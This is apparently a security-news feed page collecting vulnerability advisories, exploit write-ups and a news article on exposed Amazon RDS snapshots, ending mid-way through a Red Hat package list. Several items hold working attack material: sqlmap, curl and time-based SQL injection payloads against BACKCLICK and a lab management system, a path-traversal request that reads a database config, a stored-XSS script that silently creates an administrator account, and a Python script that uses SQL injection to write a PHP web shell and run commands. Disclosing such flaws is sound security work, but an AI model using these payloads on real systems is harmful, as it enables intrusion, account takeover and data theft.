An issue was discovered in BACKCLICK Professional 5.9.63. Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-029 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89) Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44003 Author of Advisory: Jannik Vieten, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When SQL queries are constructed, user-controlled parameters are inserted in an insecure manner. Attackers can exploit this by injecting SQL syntax into parameters to influence the query executed by the database. This can be utilized to retrieve all data stored within the database. The vulnerability exists at various locations within the application. This indicates a structural or architectural problem of BACKCLICK's construction of SQL queries. Confer the "Proof of Concept" section below for exemplary incarnations of the issue. In order to prevent such vulnerabilities, user-controlled parameters must be considered potentially malicious. When constructing database queries, parameters need to be inserted securely in order to render injected SQL syntax harmless. The use of prepared statements with parameterized queries is a method that can be used to accomplish this (see \[4\]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following examples show locations where SQL injection was possible. This list is not intended to be exhaustive. The search function within the management interface at "Abonnenten - Verwaltung" > "Test-Verteiler" can be exploited using the tool sqlmap (see \[5\]): sqlmap.py --cookie JSESSIONID=\[...session id...\] -u 'https://example.com/bc/servlet/gui.bc\_rob\_positiv?idx=1&action=1&min=0&PATTERN=\*&HPS=50' --dbms mysql --level 5 --risk 3 A similar vulnerability is also exploitable by unauthenticated remote attackers. Here, the payload for a UNION-based injection is within a base64-encoded URL parameter: curl -k -i 'https://example.com/bc/servlet/web.announcements?dHlwZT0wJm1pZD0wJmxheW91dD0xJmlkPWEnIEFORCAxPTAgVU5JT04gU0VMRUNUIChTRUxFQ1Qgc3Vic2NyaWJlcl9lbWFpbCBGUk9NIHN1YnNjcmliZXJzIExJTUlUIDEpLCAxIC0tICZwcmV2aWV3PTE;1;1;' This corresponds with the following UNION-based injection: type=0&mid=0&layout=1&id=a' AND 1=0 UNION SELECT (SELECT subscriber\_email FROM subscribers LIMIT 1), 1 -- &preview=1 The server's response contains the extracted data (here: an e-mail address) in the "Location" header of the HTTP response: HTTP/1.1 500 500 Date: Wed, 11 May 2022 13:46:11 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: JSESSIONID=...; Path=/bc; Secure; HttpOnly Location: jane.doe@example.org&bc1=1&bc2=1 Content-Length: 1181 Connection: close Content-Type: text/html;charset=UTF-8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-029 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-029.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] OWASP SQL Injection Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.html \[5\] Automatic SQL injection and database takeover tool https://github.com/sqlmapproject/sqlmap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jannik Vieten of SySS GmbH. E-Mail: jannik.vieten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Jannik\_Vieten.asc Key ID: 0xC3366ECBE2C70C423ECFC123858221C952002FFB Key Fingerprint: C336 6ECB E2C7 0C42 3ECF C123 8582 21C9 5200 2FFB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwzZuy+LHDEI+z8EjhYIhyVIAL/sFAmNk1xQACgkQhYIhyVIA L/saYQ/+LM3NsGrRo+ohC5YmL4oRY+oLXas6gXpRV6ltKPhQK64ErCtXAFQric/C q/7t7fP1tzm1LJzRV3Xf9F1OvLiRlE6ItQZeU75uTdBF/JwUl/Hqm5baCZTcbuH8 oQFw2pAVxSbphrlW9OdeiTsr5P4jVcb3MUQWhBiUq7aofr/vrHIBuBU4iP1ehz6A +6aDAdTqNmDmRTBVOoLQYuMccel4EGvUgTeFvcNCjSWhhhuEB9MCmNEHXDrUl9yi gDHzHKtIurpt2FWabc2flblL8IRLAP7z6QG4/kMPTbfuK0YUOISfO++4+UHMOUQ2 92/AMbZESMe0O26rHbnXNdygVR/FMQRFINurMcuLbb0gJtEqJXnpFJGCZ9ByeFRJ syNrjpdgaV1JwqQuJR9MBM4Fgo8rseFSQQVIGVaVMZOXkzDrFBJZMgxxpqGWx8jL HMcnmhVTEdsz6qjAHNT+hJZ8WWwJksO4RPgtpPB6lF1suaWHn7ZWzN4dUKe7DErt 6fEXFSkf1t3H8vVJLSSihyJwxO+hyVOHVBKN6NZaO/NMTLMZ+mzJjGFsC7wujrEP SziBzPxvelWKfJVKLUsbWHVr66g8T73wUVfJwNkS8ExFqUQ5HWZCOOL0nTgESPL8 vaZxzWhcPnCc9oVq6I8TuurSDQ8w3Vh2UzK3SGx+Wh5CPJy5EaU= =/w+N -----END PGP SIGNATURE-----

CVE-2022-44003

An issue was discovered in BACKCLICK Professional 5.9.63. Due to improper validation, arbitrary local files can be retrieved by accessing the back-end Tomcat server directly.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-037 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-23: Relative Path Traversal Risk Level: Medium Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44008 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to improper validation, arbitrary local files can be retrieved by accessing the back-end Tomcat server directly. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Asset files are delivered using an error handler for HTTP 404 through ImageDisplayServlet. While a check for directory traversal is in place, URL decoding is performed after that check. The check can therefore be bypassed by URL-encoding the desired path components. Due to encoding normalization, this issue did not appear to be exploitable when the host is accessed through the Apache reverse proxy. However, the Tomcat listener is also reachable over the network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The database configuration file can be retrieved over Tomcat's HTTP interface, for example using curl: - ----- $ curl --path-as-is http://:8080/bc/assets/%2e%2e/META-INF/db-config.xml mysql\_innodb \[...\] 3306 backclick \[...\] - ---- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-037 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-037.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz\_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdoJ1ggAp0bPh2PGp6ZAKXsvWD8wRPc65xwvLVTXlgAP+xarIXb5O87o57MzsxjK R66hrkN2KpyF61xAHNTEhXKitt8BKmEQAUl2ZgrB/jWj2QEllR74Iyw13msok6CR 7lHcE3MdU/6lSaddRnXIMZ1oW6rGdf9Co8zNorRx9OC1mnp42rvTPDs+66jxbX4b Qs5SaMWnahk4LOf6Zpprjv1dHokaO1xpcCnQTocb1Dhie+d956EGPwoflwmepgXQ cjSoOmrOdKMTLwdvFiH/Pgm0Kg8p9NhmrkuubgmfLVwIWdhTMlS5koaiIDeDymSc 06h1kPOPw/ksj4fYolvWi+QjYjldAQ== =fyIi -----END PGP SIGNATURE-----

CVE-2022-44008

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /diagnostic/login.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: hujun

vendors:https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

Vulnerability File: /diagnostic\_0/diagnostic/login.php

POST parameter 'username' exists delayed injection vulnerability

Payload1: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(5)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 118
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%285%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(5)), The server response time is 5 seconds

Payload2: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(10)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2810%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(10)), The server response time is 10 seconds

Payload3: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(15)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2815%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(15)), The server response time is 15 seconds

CVE-2022-43135: bug_report/SQLi-1.md at main · junHVV/bug_report

A service that allows organizations to back up data in the cloud can accidentally leak sensitive data to the public Internet, paving the way for abuse by threat actors.

Legions of databases are being inadvertently exposed monthly, through a feature of an Amazon cloud-based data-backup service. The situation gives threat actors access to personally identifiable information (PII) that they can use in extortion, ransomware, or other threat activity, researchers have found.  

Amazon RDS is a popular platform-as-a-service that provides a database based on several optional engines, including MySQL and PostgreSQL. An RDS snapshot, or a storage volume snapshot of a database instance, is an intuitive feature that helps organizations back up their databases, allowing users to share public data or a template database to an application, researchers said.

The Mitiga Research Team recently discovered the leaks in the form of numerous Amazon Relationship Database Service (RDS) snapshots that are being shared publicly — whether intentionally or by mistake.

Over the course of one month, researchers said that they observed 2,783 RDS snapshots, 810 of which were exposed publicly during the entire time frame. Additionally, 1,859 snapshots of the 2,783 were exposed for one-to-two days, which is still enough time for attackers to pounce upon the leak, they reported.

Individuals within an organization also can share these snapshots with colleagues by using the feature without having to worry about user profiles or roles — a scenario that leads to the snapshot being shared publicly, researchers said.

"These snapshots can be shared across different \[Amazon Web Services\] accounts — in or out of the on-premises organization, as well as AWS accounts that make the RDS snapshots publicly available," researchers wrote. "With that, one might unintentionally leak sensitive data to the world, even if you use highly secure network configuration."

Some of the exposures last for months, and some for just a short period of time, in both cases potentially allowing threat actors to take advantage, they said in a blog post shared online Wednesday.

**Uncovering Cloud Misconfigurations & User Errors**

The exposure once again highlights the potential for exploitation of the fragile security posture of cloud-based services that allow for enterprise resources to be shared on the public internet, Mitiga researchers Ariel Szarf, Doron Karmi, and Lionel Saposnik noted in the post.

"Attackers are always looking for new ways to put their hands on confidential information of organizations, mostly for financial gain," they wrote. "Some cloud services that allow sharing cloud resources widely to the world \[are\] exposing a new threat to organizations — unintentional sharing of information through resources like disk snapshots (EBS), or in our case DB snapshots (RDS)."

To conduct their research, the Mitiga team developed a AWS-native technique, using AWS Lambda Step Function and boto3, that can easily be integrated into an AWS environment and customized to investigate snapshot exposure.

Unfortunately, attackers also can develop such a tool to view public snapshots and perform the same tasks, allowing them to steal data from these public-facing resources and abuse it later to extort money from organizations that own it, researchers said.

Researchers outlined several specific instances in which they could access data from exposed snapshots during a month-long investigation.

One was a MySQL database exposed for the entire month that that appeared to be from a car rental agency. Exposed data included information from car-rental transactions, including PII of customers; business-knowledge data such as the type of cars in the company's fleet; and other specific rental information.

Another snapshot exposed for less than four hours came from a database of a now-defunct dating application that included a user table containing emails, password hashes, birth dates, links to personal images, private messages, and other personal data of about 2,200 users of the app.

**No PII? Still a Problem**

Even if an RDS snapshot that's exposed publicly includes no PII, there is still a way for threat actors to find out who the database and thus its data belongs to, researchers said.

In their investigation, they were able to identify who owned account IDs for many snapshots by simply looking at the snapshot name and seeing the company name in it, they said.

Moreover, every snapshot metadata contains a field called "MasterUsername," which is the main database username, researchers explained. In many cases, that username includes either the name of the company that owns the database fully spelled out or identified in acronyms and shortcuts; or a name of a person working at the company, they said.

In the latter case, by using a method that they admitted was "a little creepy, but useful," researchers conducted LinkedIn searches to find out where the people identified in the username worked, noting that this is a method threat actors could employ to do the same.

**Mitigating the Problem**

As many organizations using Amazon RDS may not even know if they have public snapshots, identifying if there are any in their respective environments is the first step toward mitigating the issue, researchers said.

Helpfully, Amazon sends an email quickly to users if they share a snapshot publicly, notifying them about the public snapshot to ensure that it was intended to be publicly available. In the case of a test done by researchers, this email was received 23 minutes after exposure.

Researchers also outlined a step-by-step way to conduct a historical check using CloudTrail logs to discover if someone created a public snapshot that potentially can be abused.

To prevent the creation of public Amazon RDS snapshots at all, enterprises should manage permissions well by adopting a practice of "least-privilege permissions," giving them only on a strict, as-needed basis.

They also can set service control policies (SCPs), which are AWS organizational-level policies that can specify the maximum permissions for an organization, researchers said. Applying SCP on an AWS root account to deny certain operations on RDS snapshot will prevent unintended sharing of RDS DBs, they said.

Organizations also can encrypt snapshots in AWS using a KMS key, and researchers confirmed in their investigation that it's not possible to share a snapshot publicly encrypted in this way, they said.

One roadblock to mitigation is that currently there's no way to know if someone has copied a public snapshot of an Amazon RDS database, as there is no log event for copying a public snapshot to another account or restoring a database instance from another account in the snapshot owner's account, researchers said.

Mitiga approached AWS about the issue and, upon confirmation that "logging an RDS copy and restore operation is currently unavailable," made a feature request to support its addition to the platform, researchers said.

Thousands of Amazon RDS Snapshots Are Leaking Corporate PII

Revenue Collection System version 1.0 suffers from a persistent cross site scripting vulnerability allowing an authenticated client user to add an administrative user account to the application then log in as the newly created admin.

    # Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated #   client user to add an administrative user account to the application then log in as the newly created admin.To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the'target', 'x_Username', and 'x_Passsword' as required).<script>var target = "http://localhost/rates/admin/usersadd.php";var req = new XMLHttpRequest();req.open("GET", target);req.send();var parser = new DOMParser();resp = req.responseTextvar document = parser.parseFromString(resp, "text/html");var token = document.getElementsByName("token")[0].value;var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";req.open("POST", target);req.withCredentials = true;req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");req.send(params);</script>

Revenue Collection System 1.0 Cross Site Scripting / Authentication Bypass

Revenue Collection System version 1.0 suffers from an unauthenticated SQL injection vulnerability in step1.php that allows remote attackers to write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.

    # Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to #   write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.#   This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.#   Ex: python3 rcsv1.py 10.10.14.2 "ls"import sys, requestsdef main():  if len(sys.argv) != 3:    print("(+) usage: %s <target> <cmd>" % sys.argv[0])    print('(+) eg: %s 192.168.121.103 "ls"'  % sys.argv[0])    sys.exit(-1)  targetIP = sys.argv[1]  cmd = sys.argv[2]  s = requests.Session()    # Define obscure filename and command parameter to limit exposure and usage of the RCE.  FILENAME = "youcantfindme.php"  CMDVAR = "ohno"    # Define the SQL injection string  sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)    # Write the PHP file to disk using the SQL injection vulnerability  url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)  r1 = s.get(url1)    # Execute the user defined command and display the result  url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)  r2 = s.get(url2)  print(r2.text)  if __name__ == '__main__':  main()

Revenue Collection System 1.0 SQL Injection / Remote Code Execution

Red Hat Security Advisory 2022-8492-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a privilege escalation vulnerability.

Red Hat Security Advisory 2022-8492-01

Red Hat Security Advisory 2022-8434-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.100 RC 2 and .NET Runtime 7.0.0 RC 2.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: dotnet7.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:8434-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8434  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-41032  
====================================================================  
1. Summary:

An update for dotnet7.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 7.0.100 RC 2 and .NET Runtime  
7.0.0 RC 2.

The following packages have been upgraded to a later upstream version:  
dotnet7.0 (7.0.100). (BZ#2134641)

Security Fix(es):

* dotnet: Nuget cache poisoning on Linux via world-writable cache directory  
(CVE-2022-41032)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2132614 - CVE-2022-41032 dotnet: Nuget cache poisoning on Linux via world-writable cache directory  
2134641 - Update .NET 7 to RC 2 [rhel-9.1.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet7.0-7.0.100-0.5.rc2.el9_1.src.rpm

aarch64:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.aarch64.rpm

ppc64le:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
